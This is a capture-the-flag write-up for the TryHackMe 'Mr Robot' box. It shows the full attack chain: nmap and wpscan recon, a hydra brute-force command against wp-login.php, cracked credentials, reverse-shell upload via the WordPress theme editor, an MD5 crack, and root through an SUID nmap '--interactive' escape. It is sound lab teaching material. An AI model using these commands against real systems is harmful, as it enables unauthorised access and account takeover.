Mr Robot
A medium Linux box from TryHackMe, use abuse wordpress admin for initial access, then an SUID binary for root.
Recon
Regular nmap scan
sudo nmap -sC -sV -oA nmap/mrrobot 10.10.210.134
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
|_http-server-header: Apache
Do a quick gobuster for directories and files on the webserver, and see that there is a robots.txt file - a lil’ on the nose
Check the robots.txt file, and it has two endpoints, one being the first flag, the other a dictionary of strings
wget 10.10.210.134/fsocity.dic
Sorting the dictionary with
cat fsocity.dic | cut -d ' ' -f 7 > tt.txt
Will probably be useful in the future for brute forcing something
Continue scanning with wp-scan for users
wpscan -eu --url 10.10.210.134/0/ --wp-content-dir
And find two users
[i] User(s) Identified:
[+] mich05654
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[+] elliot
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
Exploitation
Using the dictionary file downloaded from the site, as well as the passwords, run hydra to crack the login
hydra -L users.txt -P ./t2.txt 10.10.210.134 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 64
[80][http-post-form] host: 10.10.210.134 login: mich05654 password: Dylan_2791
[80][http-post-form] host: 10.10.210.134 login: elliot password: ER28-0652
elliot:ER28-0652 mich05654:Dylan_2791
End up with both logins, lets try elliots first because he probably is the admin of the Mr Robot box
Elliot is indeed the admin, so upload a reverse php shell using the wordpress editor, changing the 404.php page and saving the changes
Navigating to 10.10.210.134/0/ to get a 404 page, and catch the reverse shell
On the box, navigate to the home directory, and see a robot user, with two files in the home directory
key-2-of-3.txt password.raw-md5
The flag isn’t viewable as the server user, but the password is
cat password.raw-md5
c3fcd3d76192e4007dfb496cca67e13b
Using a rainbow table, the password is abcdefghijklmnopqrstuvwxyz
robot:abcdefghijklmnopqrstuvwxyz
Switch users, and get the second flag
Now looking to escalate to root, search for SUID enabled binaries
find / -perm -u=s -type f 2>/dev/null
And see nmap on the list
/usr/local/bin/nmap
Which means can spawn nmap interactively
nmap --interactive
Then inside the prompt, run !sh to get a root shell
nmap> !sh
# whoami
root